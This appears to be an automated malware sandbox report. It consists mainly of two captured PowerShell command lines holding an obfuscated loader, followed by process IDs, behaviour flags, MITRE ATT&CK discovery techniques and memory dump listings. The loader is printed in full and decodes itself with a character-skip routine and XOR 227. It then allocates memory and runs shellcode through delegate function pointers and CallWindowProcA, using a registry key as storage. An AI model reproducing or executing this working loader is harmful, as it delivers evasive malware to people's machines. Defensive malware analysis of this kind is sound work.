Cl'AmCCy7OvBLe1Pa8Un6Sp9Ra5Se8Ma6Re9Fo0Ve9An7Fl8TiAJo8Ra2Tv9He1Ju9ScAJoCNa3ImDUnEScCOu3HaBUn8ReBHe0Ga9BgAAm9Ca0du9Me7Ch8te6su8KrEUgCElDCuBRe1Bo9Ge6hu8SkDBl9Yd7Fl8AlAFl8FoEco8co6KrCdoDMiACaARe8beDBi9st7sk8Rg6gi9Vo1Sv8FoCNy9Ep3AbBGt0Sa8Li6Fu9In1He9Un5Pa8SeAEn8By0Sk8Ve6Ko9He0VeCeqDMoAAnEAn8Ps2su9Va1Un9Ce0Un8SuBFo8ke2Ka8FoFSlBAnESiDSt9PiDSt9haAEx4Ut8ch6Ko9Pr7OnAHe7Sa8Pn6al8FrFUn8No6Gk8Te4Ci8Be2Ud9de7Fu8Be6brASe5Mi8VoCVi9Si1HjAwo5Mi9hy6ta8MyDJv8Re0Be9Sn7Un8GuACh8PiCRe8GaDTeBov3Sq8TyCTo8BuAMe8moDRe9An7Ta8Bi6El9Di1krCOfBSaCGoBFr8Ud5As8Bd8Rh9Ud3AnCFl3AgCdo7HyBEn3po9Ch1ba8Le6Mi8TrAfi8ReDBe8Pi7Re8DrAAd8Ma0Co8Mo2Do9Ef7No8IoARu9Ve5Kl8An6AnCIn3StCAg7DaACu4Cu8HsFUn8Va2Fo8UnELe8PrCNo9ca6In9un1Ve8ScAMi9Me0Os9Sy4Ci8Ma4Un9Ca1InDPo7MiCSaAReCNmFGoCHa3SkCHeBReAfa4GoATu7taBko7LnCCh3GrAAl3SmCSvBGiBto8NoASaADe8BiDFe9Ma7LsBSp3kr9Ge7Re9Bo1MuBSyECaCTrFPhCTa3InBDr8reBMa6DaAStAfr8roDBe9Mi7KiDKr0SqDBl1JoBUnEGlCLeFAnCRe3SkBJe8ClBUn6DeAAtAen8HeDTo9La7coDTi0ReDTu1AfBKoETrCCiFFoCRe3ReBca8AlBUn6FoANeAEv8ScDAr9su7EnDUn0ChDSy1HoBPiETrCPoAMoCPe3HjCBnBPaBLi8SlARuAUd8ReDZo9Fr7teBCa3Aa9Mo7Ef9Fi1MaBYdEReCTeAOrCImAAfCfoAHe'Bi;Ki&Uf(Eg`$EnGCylImaSemLeoObuRirTricisovwSigPorSt7Tr)Sl Ba`$ceFteoJuxTrgFolMyoArvIneSh6Da;Lb`$agUBobConRohSvrColRoiSugSpeLe Ko=Bi ArfSokSopCo Kr`$HyGFolFraMamKloCauUprMeiMosMawPogLirEr5Vi El`$BeGFalKnaSvmAloStuAfrMaiShsMewAsgRarMi6In;Mo`$FtFSaoCoxPngKolvaoovvOrePu7Na Wi=Co RrrFliGrgSpsMabShlFleOcrUdnSpeBusTi0Rs Ra'PrCBe7saAJi8Di8ImFOv8KaCPe8Re2Nr8Ev8Cr8Th6Ud9Co1Ra8InAEm8MoDAr8In4Di9Ca0In8Sa1Po8Uc6Ud9Br0Ka8KoFOv9Ar6li9to7Re8EdDAd8PaAUt8caDAn8Bj4Ko8Vo6vu9Di1GlDUn0PaCMa3FoDdiEEiCAc3OvCDe7BiBSw1Va8Lu6En9Lo5Mu8Is6Pa9Re0Co9Tu7Et8goATi8te2Gi9Sv1Et9UnADeCPrDsnASiALa8RiDFl9ar5Wa8SkCRa8Fi8En8Pr6SaCCoBLaBSt8SaASmAMi8TuDKa9Ke7KoBIn3ho9Bo7Ms9Un1SoBEfEBoDPe9CoDFi9AlBst9Tr8Pr6Pa9Su1Co8AuCCoCTrFVaCDe3SyDDv5PaDAf7AfDbr0afCunFRuCLo3GyDRe3Af9beBauDOf0NoDAn3SwDPi3paDfi3CeCSeFOvCTe3CuDEk3Ko9FlBKaDud7SyDBi3PeCReARb'Pa;me&St(Vg`$BiGThlGlaDemSaoNouRerPuiLasPiwAagMerIk7Hy)na Ty`$QuFPioWaxBlgValSeoRivLieSt7Sa;Do`$SoFScoNexMagHolUnoKjvByeve8Sp an=su PrrLoiobgyusEfbPylSeeTirInnEkeSpsho0Be Ce'HoCBe7BaAOvESl8AnAFr8Kr0At9Sp1Se8EkCSp8OpFRy8MiCMa8Tr4le8ObAMy9fi0Er9sj7GrCBa3NoDUrELiCBo3ChCFe7TrBJo1Ko8Hy6Dv9No5Ti8So6Co9Pe0Re9Di7Se8CrAFr8An2gl9To1ua9GrALyCAbDPrAInASr8KlDPi9Su5Ud8FrCBr8Go8An8Op6InCPeBBeBAn8SaASuAun8ImDBo9Di7UdBSn3Yd9Un7Oc9Ca1TeBStEFaDSp9PrDCu9ShBBe9Fr8Al6Le9Si1St8FaCSkCNuFSyCBo3UlDGl4ElDFl0HaDMi7AnDAn7FoDTrADiDOp7AmDAs4TrDDi1KiCgaFakCdi3LaDBi3Vi9BeBSuDKo0AeDKa3SlDko3TiDJu3tyCPaFBlCPe3GrDGu3Sk9DeBBuDEp7reCKlAtr'Sv;Sy&No(De`$NeGPilSiaMamRioNauRerBuiSusSewUpgTrrUn7Pi)Al Un`$liFuioLixFogExlHooLivSteTr8Fi;In`$ObKUdlMooUnaArkBleScrAliScnDugUdsSmbFoeDisUslEnuFotInnquiFrnWagGueAlrBo0Us0Re=un'ReHSlKLaCDuUUf:om\ReFPaiGinGrsDaklo\BiCKalRoiMamHabRaaThbSylHaete'My;Sv`$ScKBilYaoAlaKokAreskrJaiRenPugUdsOubAteFasPulAnumatPinPsiUdnAmgebeGrrLi0Is1Cl Un=SarSiiBrgHasClbHelGaePerunnDyeKosMi0Re Vo'AnCSe7UnBMi4Sh8CrBFe8st2In8Fe1In8Pa1sp9CoAReDMoESeComBKoAMa4Pj8Le6Bl9Um7EnCKvESiAKvABy9Bl7Ir8Ca6ta8SuEDgBUn3Bi9Le1Re8RuCKa9Lo3Ek8Zo6Di9Av1Di9Fo7Cr9PrASpCTi3CeCHoEInBCi3De8Ta2Ti9My7Re8MoBGaCTe3saCAl7HoASe8Ar8AfFGe8OvCOm8Fo2Sv8Ud8Va8Cl6Su9Kl1Sk8BrAun8VoDFr8Fa4Ru9Be0Jo8Un1Sk8Ch6Pa9Va0Fo8HaFPh9Ro6Ba9Da7Be8DeDRu8FoACo8unDMi8Ch4Re8Gr6Pr9Fa1KvDIn3frDRa3GuCDeAMaCBaDBoAstFAa8Ph6Be8Sn2Se9Tr7no8WeBOu8Po6Re9pe1Ep9op0Po'Sa;Uv&Or(St`$SiGBrlUnaSymKloMouBirGliDisFawTrgKurQu7Hi)Be se`$TuKpilReoBeaUdkOgeDorMaiTenSygSosSkbreeSasSalSlufotUtnEmiChnBrgfieSprEn0Al1si;Su`$MuFLnoCoxCagMolBeoKovBeeSk9Li sa=Fa PurRiiFagDesInbMalOfeKnrFinEseCosDi0No Se'DeCal7ReAan5Da8NoCti9SuBTa8An4ta8RuFCe8SaCBo9de5No8Sl6YaCBe3HuDHoESpCDu3noBLs8unBNy0Kl9SkApr9Se0Af9Tr7Ad8Cy6Sh8FoEPeCEnDErAsa0Ea8DaCun8BhDBy9Un5Pa8Sn6Oa9On1Me9Fo7DeBTeENoDAs9EkDUn9veAHo5Sn9Le1Fl8SmCMo8FeETiAEt1Ti8La2Vi9Sk0Di8Bl6GrDBl5TrDKu7UnBLe0Fl9Sk7Pr9Go1Lo8FuAAb8OrDIa8Pr4EmCmrBTeCov7foBDi4Un8PhBBe8Fo2Kn8fr1An8Ar1Sm9JoADrCUbACa'ap;Ki&Ro(Mi`$SuGWalCeagumNyoPuuUnrAtiLisInwBygSerMo7Wa)Du fo`$FlFPaoArxAggSulBaoFrvSjepr9Cu;Ar`$DiWKihCaaSabdibDuyAn0Te Ex=Hj WirOpiCigPasDrbIrlAfeTjrmonNoeGisTi0pe Mo'SeByn8KoBfi0Su9SoAun9Me0Gn9Ko7Tr8Na6Sa8AdEDeCTrDOkBBr1Om9Pa6Fl8NoDpl9Fr7Ac8PaAIn8SeEci8an6beColDNoAHeAob8JuDPr9Pe7Ak8Tr6Sa9Sk1Mu8StCFr9Mi3UnBEg0Fl8Fa6Aa9Fr1Kl9Er5Re8PaASa8Du0Br8Sp6Im9Fo0UnCUnDDiAKuEBu8Jo2Up9In1Wi9Ma0Pe8KoBfa8rd2Do8EtFPrBCoEThDDu9ReDPa9CrAUs0Fa8HaCPa9Cu3Fo9StAVeCAiBInCMe7UbANe5Un8EgCRe9DiBAc8Ti4Sp8ReFCo8KaCAn9Pa5Re8Kl6TeCmaFKnCFi3FiDUn3AlCSkFReCRe3SlCFo3ReCLa7IvAFi8Ve8SkFSt8StCRe8Th2Fo8Da8Un8Sy6Ag9ed1ag8DeATr8MiDUr8Hj4gr9Op0La8Op1Ty8Hy6pr9Fe0pl8EqFFo9Ar6Se9Ko7sa8PeDSn8SkAMi8hoDIr8Wi4Ca8Sk6Na9Re1BaDSu0ClCSuFHeCBe3PaDSt5CaDEx7FrDVi0HeCPrASu'ka;Te&at(Bo`$MaGNelFuaremnaoThuUdrKriArsThwIngBarRe7Eg)Pr Ri`$OpWPlhKaaDebSabDvyMi0un;St`$InIRenRisBltSoiFatMruDatUkiInoAfnCoaHalLaiMisCutSisEx=Di`$OxFBaoMaxScgKelPeoAfvOreMa.MacgooTruVinEjtBo-At6Je4Sp3In;Ol`$CoWHahScaRubRubFoyUd1Sk Me=Im ElrVaiKogDasKnbBulTaeHurFonMdebasDi0Ho Ac'GoBEq8BaBRa0Ro9IrAar9Tj0Cr9Ve7Pr8Di6So8DaEUnCRiDReBSk1Tr9Si6Be8PrDal9Gd7Ti8BeAPl8UnEVa8de6AnCNeDDiAdaADe8AgDPe9Om7Pr8Al6ko9Sa1Ti8InCRe9An3StBTe0Po8Pr6bi9Sk1Ns9Br5Or8MeARe8Vg0Ae8Ca6En9Ga0eyCLaDTyAAnEGe8Be2Li9Sj1Hj9od0My8OpBSi8ja2Bo8AuFSeBstEAlDCa9PrDUn9BaAKi0Dd8AnChe9Fo3Sk9TaAPuCGrBUpCAn7DeAEu5No8FoCBy9KjBVi8Di4Sc8ViFLi8CoCMe9Eu5Un8Me6moChuFDiCEk3UnDUn5BoDTi7FrDTo0ReCOfFMaCAn3UnCNo7TaAUfEMi8FoASt8Gi0Ta9Af1Po8ObCFo8FrFMe8DeCou8Jo4Dr8OpAHo9Bi0Je9Hv7WeCdiFAfCSt3KaCFl7DaAsoACo8FrDSk9Ko0Sp9Pu7st8NoAhe9Ra7Pr9So6Pr9Im7Ge8UdAPa8MiCop8VoDti8Ar2Dy8ReFSp8ToACu9Sy0Le9La7Bi9Ra0KaCEuARe'st;Un&St(Ge`$TaGPrlGoaUnmNeoImuSerPoiUdsAtwArgNorDi7Fo)Se No`$AcWDihquaInbSabAlyFy1Pe;Ti`$FuWHjhmiaVibInbunyUn2Bo Op=Sy InrUniAagFrsSpbimlInePrrRenSkeTasAn0Va St'reCSp7HeASu0Bi8reBDe9No1Ba8NoCLi8SiDUn8OvAMa8La0Un8WrFTo8br6er8Ho7TeCRu3VeDNiEmyCCo3TsBSp8SiBPi0Un9MyAAr9Ti0ma9Ch7Pa8Fo6Fo8ScEAnCCaDLeBUn1Im9Su6Re8DiDFo9Po7Ta8HeAJu8MeESe8Co6KoCLaDAtAVaAKu8UvDWh9De7La8St6Va9Fe1Ha8NeCIn9De3teBOk0Cr8Br6St9da1To9Py5Af8HsAtr8Kn0Ro8so6Ge9Re0SuCStDHeARtEVa8Im2Tr9Ko1Do9Fo0Se8SoBCi8To2Su8ReFKmBOrEstDUd9BrDSu9PrAKi4Ti8St6Hu9Be7MoAHe7Ge8Sk6Dg8deFKr8Po6Sn8Ly4Sg8Fo2Wr9Un7Af8Af6EtALa5Ap8CoCti9Re1TrAPr5Di9Or6Ne8ToDTa8Ar0Ti9Sa7ph8skAJe8BuCDe8UdDDoBSt3Ud8SjCAe8InASt8caDAj9Be7Fa8mo6Al9Le1IvCGnBInCRuBDe8Co5Tj8Ri8Re9Hi3inCLy3TrCfo7weAKnADr8pe7Cu8pr6Rh8TeDSa9Al7Ba8ChAMo8Af5ma8slACi8Tr0Fe8Ex6Ny9Af1Tr8BrAPo8TrDIn8Un4Pr8in6Te9So1Am8FoDDo8in6SpDSy1MiDsc3SeDDi0PrCUn3HjCSo7AnBCa7Wi8DeAri8Vo7Pr9Fo0Ke8BiBal8BoCBo9Re1bj8phAFo9Dr0Gy8UdCUn8ReDBo9Bo7Al8Sa6Ge8BrDReCDiAAnCTrFSkCMi3TrCFiBPeAPe4UfAHu7TaBBi7BeCSc3LrASk3TiCUnBstBBi8FoAUrARe8GaDPe9Fi7SiBMe3El9Sa7Si9Ma1InBSkEOrCWaFBrCVa3ChBAn8GrATiARi8DaDPr9Ts7EqBKi3Un9Sp7Bl9He1ThBInEPaCBaFanCUd3AnBGe8InAdrADa8SyDSt9Op7stBHa3so9In7Mi9Ov1PaBhaEBeCUnFUdCSh3noBDo8SyATiASk8FoDVr9In7SoBEp3Bl9Kr7Be9Ev1BoBAfEStCQuFLaCLa3MeBTv8NeASkAfo8LiDNe9Od7TiBCi3Sa9To7Un9Av1ToBRoEInCJuAMiCDa3TiCSpBInBIn8SeAWaAOs8taDKn9Da7NoBPy3Sk9Pp7Ka9Ta1OrBFlEThCSeAFuCtrAPeCCaAWi'Kr;Na&Vi(No`$FaGOslToaUnmDooDeuHorStiPasTewBugEarNy7Ke)Un Ko`$BeWNyhCeaObbFrbApyIn2Ou;Am`$FrWElhSaaLebGybGlySk3Si Ge=in berNoiUngovsAsbNolAceDarUnnTeeInsHa0Ha Dr'TiCTe7FrAPa0In8SuBFl9Ud1Py8SeCTh8LiDTv8SvAUn8Tr0Pa8InFCi8Ey6Ov8Va7SoCSeDAlAFeAIn8BlDNo9Ko5sl8SoCZi8En8He8Ep6DyCFeBlaCVe7HaAZi8Ud8UnFTi8TrCsu8Al2Ch8An8Pa8Fl6Fu9Ho1Fa8MrARe8SuDOp8Ia4Cl9Ko0St8Dr1sa8Ge6sp9Go0Tr8AfFro9Fo6Ha9Si7Lo8MaDDr8SpAhu8apDRe8Se4Ha8Ho6In9Ru1KiDTo0frCDeFCiCCo7HoASeEKa8FiAKd8Ri0Sq9Ak1Al8BrCkl8SaFBl8AaCNu8Ko4Wi8GeADo9Li0An9Po7HoCAbFStCCo7BoBTo6Me8Se1Ad8SkDOp8BeBse9Mi1To8UnFAl8PrAtr8Ri4Al8Ak6KaCUnFSjDCo3BrCPhFDoDMe3MoCPrAek'Vu;Bl&Bi(Je`$SuGAnlTraAnmUnoHeuDorLoiJosPhwCogLarHy7Sv)ob Vi`$NoWTahStaRobDabStyPo3Ra#Sp;""";;Function Whabby9 { param([String]$Konsterneret); For($Quiff=2; $Quiff -lt $Konsterneret.Length-1; $Quiff+=(2+1)){ $rigsblernes = $rigsblernes + $Konsterneret.Substring($Quiff, 1); } $rigsblernes;}$Nontransitionally0 = Whabby9 'Fe pe Am cy Sv Se Ka ar Va Ba Ro Fr Ag Co De ac Am Ch Re St Ru Ba Un ClIReEApXJy ';$Nontransitionally1= Whabby9 $togolesisk;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Nontransitionally1 ;}else{.$Nontransitionally0 $Nontransitionally1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2264

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function rigsblernes0 { param([String]$Konsterneret); $Aabenbares = New-Object byte[] ($Konsterneret.Length / 2); For($Quiff=0; $Quiff -lt $Konsterneret.Length; $Quiff+=2){ $Chefpilot = $Konsterneret.Substring($Quiff, 2); $Aabenbares[$Quiff/2] = [convert]::ToByte($Chefpilot, 16); $Aabenbares[$Quiff/2] = ($Aabenbares[$Quiff/2] -bxor 227); } [String][System.Text.Encoding]::ASCII.GetString($Aabenbares);}$udkastelses0=rigsblernes0 'B09A9097868ECD878F8F';$udkastelses1=rigsblernes0 'AE8A80918C908C8597CDB48A8DD0D1CDB68D90828586AD82978A9586AE86978B8C8790';$udkastelses2=rigsblernes0 'A48697B3918C80A2878791869090';$udkastelses3=rigsblernes0 'B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAB828D878F86B18685';$udkastelses4=rigsblernes0 '9097918A8D84';$udkastelses5=rigsblernes0 'A48697AE8C87968F86AB828D878F86';$udkastelses6=rigsblernes0 'B1B7B09386808A828FAD828E86CFC3AB8A8786A19AB08A84CFC3B396818F8A80';$udkastelses7=rigsblernes0 'B1968D978A8E86CFC3AE828D82848687';$udkastelses8=rigsblernes0 'B186858F8680978687A7868F8684829786';$udkastelses9=rigsblernes0 'AA8DAE868E8C919AAE8C87968F86';$Glamouriswgr0=rigsblernes0 'AE9AA7868F8684829786B79A9386';$Glamouriswgr1=rigsblernes0 'A08F829090CFC3B396818F8A80CFC3B086828F8687CFC3A28D908AA08F829090CFC3A296978CA08F829090';$Glamouriswgr2=rigsblernes0 'AA8D958C8886';$Glamouriswgr3=rigsblernes0 'B396818F8A80CFC3AB8A8786A19AB08A84CFC3AD8694B08F8C97CFC3B58A919796828F';$Glamouriswgr4=rigsblernes0 'B58A919796828FA28F8F8C80';$Glamouriswgr5=rigsblernes0 '8D97878F8F';$Glamouriswgr6=rigsblernes0 'AD97B3918C97868097B58A919796828FAE868E8C919A';$Glamouriswgr7=rigsblernes0 'AAA6BB';$Glamouriswgr8=rigsblernes0 'BF';$Identificeringerne203=rigsblernes0 'B6B0A6B1D0D1';$Tidshorisonten=rigsblernes0 'A0828F8FB48A8D878C94B3918C80A2';function fkp {Param ($Embryophyta131, $Rten) ;$Foxglove0 =rigsblernes0 'C7A4828E8290C3DEC3CBB8A29393A78C8E828A8DBED9D9A0969191868D97A78C8E828A8DCDA48697A29090868E818F8A8690CBCAC39FC3B48B869186CEAC8189868097C398C3C7BCCDA48F8C81828FA29090868E818F9AA082808B86C3CEA28D87C3C7BCCDAF8C8082978A8C8DCDB0938F8A97CBC7A48F828E8C96918A90948491DBCAB8CED2BECDA69296828F90CBC7968788829097868F908690D3CAC39ECACDA48697B79A9386CBC7968788829097868F908690D2CA';&($Glamouriswgr7) $Foxglove0;$Foxglove5 = rigsblernes0 'C7A296978C8280978A9582978A8C8DC3DEC3C7A4828E8290CDA48697AE86978B8C87CBC7968788829097868F908690D1CFC3B8B79A9386B8BEBEC3A3CBC7968788829097868F908690D0CFC3C7968788829097868F908690D7CACA';&($Glamouriswgr7) $Foxglove5;$Foxglove1 = rigsblernes0 '91869796918DC3C7A296978C8280978A9582978A8C8DCDAA8D958C8886CBC78D968F8FCFC3A3CBB8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAB828D878F86B18685BECBAD8694CEAC8189868097C3B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAB828D878F86B18685CBCBAD8694CEAC8189868097C3AA8D97B39791CACFC3CBC7A4828E8290CDA48697AE86978B8C87CBC7968788829097868F908690D6CACACDAA8D958C8886CBC78D968F8FCFC3A3CBC7A68E81919A8C938B9A9782D2D0D2CACACACACFC3C7B197868DCACA';&($Glamouriswgr7) $Foxglove1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Noblest,[Parameter(Position = 1)] [Type] $Boost = [Void]);$Foxglove2 = rigsblernes0 'C7AD868E82978C848D82978BC3DEC3B8A29393A78C8E828A8DBED9D9A0969191868D97A78C8E828A8DCDA786858A8D86A79A8D828E8A80A29090868E818F9ACBCBAD8694CEAC8189868097C3B09A9097868ECDB186858F8680978A8C8DCDA29090868E818F9AAD828E86CBC7968788829097868F908690DBCACACFC3B8B09A9097868ECDB186858F8680978A8C8DCDA68E8A97CDA29090868E818F9AA1968A8F878691A28080869090BED9D9B1968DCACDA786858A8D86A79A8D828E8A80AE8C87968F86CBC7968788829097868F908690DACFC3C785828F9086CACDA786858A8D86B79A9386CBC7A48F828E8C96918A90948491D3CFC3C7A48F828E8C96918A90948491D2CFC3B8B09A9097868ECDAE968F978A80829097A7868F8684829786BECA';&($Glamouriswgr7) $Foxglove2;$Foxglove3 = rigsblernes0 'C7AD868E82978C848D82978BCDA786858A8D86A08C8D9097919680978C91CBC7968788829097868F908690D5CFC3B8B09A9097868ECDB186858F8680978A8C8DCDA0828F8F8A8D84A08C8D95868D978A8C8D90BED9D9B097828D87829187CFC3C7AD8C818F869097CACDB08697AA8E938F868E868D9782978A8C8DA58F828490CBC7968788829097868F908690D4CA';&($Glamouriswgr7) $Foxglove3;$Foxglove4 = rigsblernes0 'C7AD868E82978C848D82978BCDA786858A8D86AE86978B8C87CBC7A48F828E8C96918A90948491D1CFC3C7A48F828E8C96918A90948491D0CFC3C7A18C8C9097CFC3C7AD8C818F869097CACDB08697AA8E938F868E868D9782978A8C8DA58F828490CBC7968788829097868F908690D4CA';&($Glamouriswgr7) $Foxglove4;$Foxglove5 = rigsblernes0 '91869796918DC3C7AD868E82978C848D82978BCDA09186829786B79A9386CBCA';&($Glamouriswgr7) $Foxglove5 ;}$Preindicative = rigsblernes0 '8886918D868FD0D1';$Foxglove6 = rigsblernes0 'C7B186958690978A82919AC3DEC3B8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAE8291908B828FBED9D9A48697A7868F8684829786A58C91A5968D80978A8C8DB38C8A8D978691CBCB858893C3C7B391868A8D878A8082978A9586C3C7A48F828E8C96918A90948491D7CACFC3CBA4A7B7C3A3CBB8AA8D97B39791BECFC3B8B6AA8D97D0D1BECFC3B8B6AA8D97D0D1BECFC3B8B6AA8D97D0D1BECAC3CBB8AA8D97B39791BECACACA';&($Glamouriswgr7) $Foxglove6;$Ubnhrlige = fkp $Glamouriswgr5 $Glamouriswgr6;$Foxglove7 = rigsblernes0 'C7A88F8C828886918A8D84908186908F96978D8A8D848691D0C3DEC3C7B186958690978A82919ACDAA8D958C8886CBB8AA8D97B39791BED9D9B986918CCFC3D5D7D0CFC3D39BD0D3D3D3CFC3D39BD7D3CA';&($Glamouriswgr7) $Foxglove7;$Foxglove8 = rigsblernes0 'C7AE8A80918C8F8C848A9097C3DEC3C7B186958690978A82919ACDAA8D958C8886CBB8AA8D97B39791BED9D9B986918CCFC3D4D0D7D7DAD7D4D1CFC3D39BD0D3D3D3CFC3D39BD7CA';&($Glamouriswgr7) $Foxglove8;$Kloakeringsbeslutninger00='HKCU:\Finsk\Climbable';$Kloakeringsbeslutninger01 =rigsblernes0 'C7B48B8281819ADECBA48697CEAA97868EB3918C938691979AC3CEB382978BC3C7A88F8C828886918A8D84908186908F96978D8A8D848691D3D3CACDAF8682978B869190';&($Glamouriswgr7) $Kloakeringsbeslutninger01;$Foxglove9 = rigsblernes0 'C7A58C9B848F8C9586C3DEC3B8B09A9097868ECDA08C8D95869197BED9D9A5918C8EA1829086D5D7B097918A8D84CBC7B48B8281819ACA';&($Glamouriswgr7) $Foxglove9;$Whabby0 = rigsblernes0 'B8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAE8291908B828FBED9D9A08C939ACBC7A58C9B848F8C9586CFC3D3CFC3C3C7A88F8C828886918A8D84908186908F96978D8A8D848691D0CFC3D5D7D0CA';&($Glamouriswgr7) $Whabby0;$Institutionalists=$Foxglove.count-643;$Whabby1 = rigsblernes0 'B8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAE8291908B828FBED9D9A08C939ACBC7A58C9B848F8C9586CFC3D5D7D0CFC3C7AE8A80918C8F8C848A9097CFC3C7AA8D90978A9796978A8C8D828F8A909790CA';&($Glamouriswgr7) $Whabby1;$Whabby2 = rigsblernes0 'C7A08B918C8D8A808F8687C3DEC3B8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAE8291908B828FBED9D9A48697A7868F8684829786A58C91A5968D80978A8C8DB38C8A8D978691CBCB858893C3C7AA87868D978A858A8086918A8D8486918D86D1D3D0C3C7B78A87908B8C918A908C8D97868DCACFC3CBA4A7B7C3A3CBB8AA8D97B39791BECFC3B8AA8D97B39791BECFC3B8AA8D97B39791BECFC3B8AA8D97B39791BECFC3B8AA8D97B39791BECAC3CBB8AA8D97B39791BECACACA';&($Glamouriswgr7) $Whabby2;$Whabby3 = rigsblernes0 'C7A08B918C8D8A808F8687CDAA8D958C8886CBC7A88F8C828886918A8D84908186908F96978D8A8D848691D0CFC7AE8A80918C8F8C848A9097CFC7B6818D8B918F8A8486CFD3CFD3CA';&($Glamouriswgr7) $Whabby3#"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4716

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2264-132-0x0000000000000000-mapping.dmp

Download
memory/2264-133-0x000001E2D6A80000-0x000001E2D6AA2000-memory.dmp

Filesize
136KB

Download
memory/2264-148-0x00007FF84F690000-0x00007FF850151000-memory.dmp

Filesize
10.8MB

Download
memory/2264-135-0x00007FF84F690000-0x00007FF850151000-memory.dmp

Filesize
10.8MB

Download
memory/4716-140-0x0000000005D20000-0x0000000005D86000-memory.dmp

Filesize
408KB

Download
memory/4716-137-0x0000000005680000-0x0000000005CA8000-memory.dmp

Filesize
6.2MB

Download
memory/4716-138-0x0000000005530000-0x0000000005552000-memory.dmp

Filesize
136KB

Download
memory/4716-139-0x00000000055D0000-0x0000000005636000-memory.dmp

Filesize
408KB

Download
memory/4716-136-0x0000000002AE0000-0x0000000002B16000-memory.dmp

Filesize
216KB

Download
memory/4716-141-0x0000000006400000-0x000000000641E000-memory.dmp

Filesize
120KB

Download
memory/4716-142-0x0000000007D70000-0x00000000083EA000-memory.dmp

Filesize
6.5MB

Download
memory/4716-143-0x0000000006950000-0x000000000696A000-memory.dmp

Filesize
104KB

Download
memory/4716-144-0x00000000076F0000-0x0000000007786000-memory.dmp

Filesize
600KB

Download
memory/4716-145-0x0000000007610000-0x0000000007632000-memory.dmp

Filesize
136KB

Download
memory/4716-146-0x000000000CA00000-0x000000000CFA4000-memory.dmp

Filesize
5.6MB

Download
memory/4716-147-0x00000000083F0000-0x000000000C9FC000-memory.dmp

Filesize
70.0MB

Download
memory/4716-134-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing